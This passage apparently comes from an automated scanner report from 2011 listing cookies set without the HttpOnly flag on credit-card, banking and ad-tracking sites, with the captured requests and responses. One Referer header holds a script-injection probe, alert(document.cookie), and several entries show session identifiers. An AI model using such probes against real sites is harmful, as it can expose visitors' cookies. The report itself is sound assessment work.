Path:	/usc/platinum/MC/external/affiliate/Mar2011/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529043&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=11&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:13:02 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/
Date: Fri, 17 Jun 2011 12:13:01 GMT
Connection: close
Content-Length: 5829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

10.25. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734 HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=11&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:13:30 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/
Date: Fri, 17 Jun 2011 12:13:30 GMT
Connection: close
Content-Length: 5761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

10.26. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=11&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_PlatSelect_Visa_21monthBTP%7C1308314576185%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

10.27. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1308311947421%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Sat, 16-Jun-2012 11:59:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.28. http://s46.sitemeter.com/js/counter.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

IP=173%2E193%2E214%2E243; path=/js

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=s46cccgblog HTTP/1.1
Host: s46.sitemeter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 12:11:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7264
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:21:39 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...

10.29. http://sales.liveperson.net/hc/32528459/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/32528459/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=8195223722925837910; path=/hc/32528459
HumanClickACTIVE=1308311975001; expires=Sat, 18-Jun-2011 11:59:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/32528459/?&site=32528459&cmd=mTagKnockPage&lpCallId=630825764266-999114822595&protV=20&lpjson=1&id=7998289160&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sb-sales-english%7Cnull%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1308311533149; ASPSESSIONIDAQSCRRRS=PBNCLIECMNLIHJBBIOIPPANI

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8195223722925837910; path=/hc/32528459
Set-Cookie: HumanClickACTIVE=1308311975001; expires=Sat, 18-Jun-2011 11:59:35 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 11:59:35 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28177

lpConnLib.Process({"ResultSet": {"lpCallId":"630825764266-999114822595","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.30. http://sales.liveperson.net/hc/32528459/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/32528459/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1308312148817; expires=Sat, 18-Jun-2011 12:02:28 GMT; path=/
HumanClickSiteContainerID_32528459=STANDALONE; path=/hc/32528459
LivePersonID=-16101514677756-1308311975:-1:1308311999:-1:-1; expires=Sat, 16-Jun-2012 12:02:28 GMT; path=/hc/32528459; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/32528459/?&site=32528459&cmd=mTagKnockPage&lpCallId=693976194597-483333286596&protV=20&lpjson=1&id=2065431685&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sb-sales-english%7Cnull%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6682965583658191868; LivePersonID=-16101514677756-1308311975:-1:-1:-1:-1; HumanClickSiteContainerID_32528459=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQSCRRRS=PBNCLIECMNLIHJBBIOIPPANI; HumanClickACTIVE=1308311973932

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:02:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1308312148817; expires=Sat, 18-Jun-2011 12:02:28 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 12:02:28 GMT
Set-Cookie: HumanClickSiteContainerID_32528459=STANDALONE; path=/hc/32528459
Set-Cookie: LivePersonID=-16101514677756-1308311975:-1:1308311999:-1:-1; expires=Sat, 16-Jun-2012 12:02:28 GMT; path=/hc/32528459; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28177

lpConnLib.Process({"ResultSet": {"lpCallId":"693976194597-483333286596","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.31. http://spotlight.creditcards.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 11:58:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=1&target=_blank&cb=70986151927&charset=UTF-8&loc=http%3A//blogs.creditcards.com/&referer=http%3A//www.creditcards.com/points-rewards.php HTTP/1.1
Host: spotlight.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; OAID=aaa441a9105b309385d19a81a43e09ae; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311932226%27%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:55 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 11:58:55 GMT; path=/
Content-Length: 1313
Content-Type: text/javascript; charset=UTF-8

var OX_aa3ed954 = '';
OX_aa3ed954 += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OX_aa3ed954 += "/* openads=http://spotlight.creditcards.com/www/delivery bannerid=26 zonei
...[SNIP]...

10.32. http://spotlight.creditcards.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 11:59:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=26&campaignid=3&zoneid=1&loc=1&referer=http%3A%2F%2Fblogs.creditcards.com%2F&cb=7899e1c4b9 HTTP/1.1
Host: spotlight.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cc=true; OAID=aaa441a9105b309385d19a81a43e09ae; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:02 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 11:59:03 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.33. http://tags.bluekai.com/site/2750 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2750

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=gUoquR7lj5Zd8JkA; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
bkc=KJh5Naa/DtWDOdedqPFmkjBYYo31/emZ+QGCuYsH7QptmBZexyhEiUhDJ96PbzDxVosYuetWFQiZfvAKOGN9KryoYFJaWTDCpkYZGIizKdKNKXfefFMh7UmIzIf2fL6W9cXVKB+HMJ6YAYswJSVfFsVw7QcI7gSycils9Ci6lEX1TRSq6Cckoo96Nl4q9IZNoX9JtRwc+o5YpFTKJs6Fvr5c/Jhf/Otb3BqcSSftRLy3pHKk4+INXqyP3YjFcysoBZK54q2jZFLl8Fy625BhydsTe0QA3WS6fsbF5J4n24ufudmKlpZmHHelLELejjXWQKHlYpUAEF0yt97km1Vfp4VBrPbXPmXSzFjIFsbXV6UgihRvKXz642MtCtA/zfhhkooI4y7/Agkd2GG0hhLF62foBO9ImvEXEJe5IA0STTldP9ON4zY2C6TIITG0hhFfvwdn1FYPXG6dvTX+ue2u7o0UUoiEl7G+F4NvI340BIUSk2n7kvrDFz3MvKZCsK7Xkwu+sZZIUXSg8wPw21bbwv2XrDbSXT6MjTcoqQr84BAe/KAIjzTlf3cnZI498FbCdUlovj6URlXkLWc7GlcwiV5weA+wvcmIXuh2E/Jqaoo35dXfGcy2nwtqpo4qOXo88uz+67fkyClo4KP4037q6iIDKEfMu7GKcIkXU7Y8563b4DvSdTle2eT7gkgYrU38pFLjdyBzGlah; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
bkst=KJhBAn2gNWWxhqz/snyzWxxqHupuqopj74taCRxAcYjz8/CQDrfm4gIQy3kaevHmgfSoqnxPguVxd9DtRoku6NAJ6zqjLXkVy8Lwfft5m4Uk3oJlIF7fKWT50f0AQitIxWTbKhz6Jj56jYv5QtcsbGph85teFXv4Yc2afDt4EjdFEpILBKk6jCcfTM3qVDKqguqZgswBxR4K5Bxkf0Z0I5xiFNbtInwzncbJ5aNau+8jXeRjjTNpW4prbpBjny8STq4lspGKBBuuOlY9comhAuyipFdX/KFexu+e+D/GccVUx+s/AqV+cK+x/MrVY/Z8mdFdKIaF3+VP2KlNgDzwd5gM0Kgn6Dc54pc3K4H6LbTzpHG1adb7siO6CoyO3VACrL7184jx3xDPUdsEFz7sKs57Rd4sgUwHFTkIHbsJ+GHA9Y6Q91ikvyvnpnTl8/z4ZX48LeVF0Kzx351h9VGv+5moPo7bCJZnHR5WF0IWFl4+6C740slI9VrbKQA=; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.34. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=tjN2bLOLq2Sd8JkA; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bkc=KJh5NWa/asWDOded8sbgkCraani0OJ3hjPLHOYDD6AWvkATgKpYAv9FFugHvi7HHCnSGxvHnbWVGjW2NYJH9m7GvCqoAAgY/ShugRFEKEkXfdlKRsU8XfdIIqtSIZKyIT12KeyFJ7PxWN8WPlI6cIzxj5LvTBzqrYgsgyW8vd+Uk7PxP/MQQUF6B81uKNvZF7VBgwt4BEX4X2K8OH2kEhLUf/O5rLVBctc7JUpN5bEXfYsy74EX19bV1gecQfCYfvI9Vmu8Jd+YwgPxYbqYbLfqifuCyRXkeFqQE08TbR80VI3YNFfwtuddg5h0aX7ybfghVJIBEcAggVlJdXqn4MRvL2zfpLrQlezYXVBKF4ZtL2zTp17zIeXxl467IxNE52Gi+2zbfWSY8OfC0hXIgZT0NlMALIDXpyvnA7EXSe600KTtcJ2iEn2Qgp2igE2k4MeXqBp8Ccpur1yTjjlwLF7atzRH2+ob+pXF8gUCCEgfHQYK1MpSpBKIzt9I157LGaYrIatwlssFKISSzUGTOlpq644FVzK43srYgf/IEblb2Kgi4wVuLKK47XFm/g7CGqPpffNgMDlctE2k4xVXSaT64UsHUs8zrLeK1FhF7pg14sIF2m54/IlQFIdByyn5ctmNeqn6bhIPfpCpp0/DVc+487wXYrchQyy==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bko=KJ0ETtBQucUXfzF11/ZBQVsYdV24UGRZeQRsEdl4FAy1WfkCnsVQfcs2lfb1evK8Rvy5yC9VWT13nTxk0meBYhBECfnTsV/a/uhZCgwzWORnxpQf6af8U6OE5/YZdcMlWXQ3a/uTCRkOM8ZOTKv7gfbze9h91u6Qi8cCe+9XcjZUxnNhxC9VW61iP/0P/H2GcFmn86ONYEy1ecaw7Qa+6TvpnFaeVWeqKsWLuSewlyU49Lgv9kAOsbXeExR9WE2s4x==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bkw5=KJ0akaN/DtWRhddcGp7wp9pXiOjHARjpS6L7nis5hrRTtl9UxxVHtjj52xDa6RGIMmG09k5K5eP0xUxHCGH/WAH6sHEHgVWUxPaSHa4VX8plMw4xl+cQwsKzldmXpdzfNQq9PzHgKFUiSiKQ/K4tKRYLQ6HyluR5xVePu8I1/kRNGOkcRAp3MnZfxJKkPxedBnp+jPkMqngpnl77/WLIRviri1B6t7qXbQJ6mynCnK4tOkPSc1tEu8U/MWKgxcquSDd2/QmeUksXf8/j29VWeVz2Q/DKGWRHM49LFJHqknpTbqksjW/clmi6iqziTEwPCwtGuD4a60ocyBZLfUqtTbE5M8KwQ9XCIAxtw3oSmTbcojXqwRJyo+lTaoS7lU/xcfTbqsSJh/iX3uDa2mXVhB1v+/V8qkBGgyn3zzGW3ocUF8BsUF2+uPz4ud2ZeHttn7K0OK5/+TgbBUiapMu0W6YZMdNwTu4hHQxstW+KUhTcMM7/mr000x3HWyfuQYsqL1dEeg/KOtl0QtpmmWQE2+rWRffG/1t/tTEpKnhcNMmWMdt0SMzMywis/gJVep8cjB2KHsx2TpQ6vs6ZG20h9rSgr9R+vH7NukESZJiw0V7nh1uWzZyqX40dCm5xEUQmNRuM4CDEBXRpBfNyBiSM7C6VDlYqqnjC5aCmQu+mEdtDkDIl0qkBTye2UtBworiiSzG5YbcVPBXH8P3kqBuWLNWEpZRL/qvJDYQsPA686TLJzUL66VLF8Cn02+iUavzNfr9/Q6kN7mPSoEMPCmBDWTfpENnLOk4BMzDA0fpI053QXZtbRWZr35QY155i0dvbLzu0QKH/uZudHK58e3jAn21VvPiAsQccOe8AGANq1V3RE/ZbXJjKcCcHzdIl/oWV+0glwI4IzoEkX7ZVeppLjjgAw5rY+XSn6qubArPSoD330Rp08a/kfNrAR1NYvpvVppoeTfP0lePd9jrOJTD=; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.35. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bankofamerica.com
Path:	/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerngen-www.80=918992555.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 17 Jun 2011 12:25:20 GMT
Content-length: 24401
Content-type: text/css
Last-modified: Sat, 11 Dec 2010 00:36:35 GMT
Etag: "5f51-4d02c793"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=918992555.20480.0000; path=/

/* top level font to cascade */
.standard-font {font-size: 71%; font-family: Verdana,Arial,Geneva,Helvetica,sans-serif;}
.standard-font2 {font-size: 90%; font-family: Verdana,Arial,Geneva,Helvetica,sa
...[SNIP]...

10.36. http://www.capitalone.com/css/global/portal_base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_base.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=29FB6279666D0428; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.37. http://www.capitalone.com/css/global/portal_common.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_common.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=A0443C7AC9C03A80; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.38. http://www.capitalone.com/css/global/portal_grid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_grid.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=36A4741F4351C1C5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.39. http://www.capitalone.com/css/global/portal_print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_print.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=6BEC44E31BF1D852; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.40. http://www.capitalone.com/css/page-type/portal_landing-accordion.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_landing-accordion.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=3356A9F2A6EF7136; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
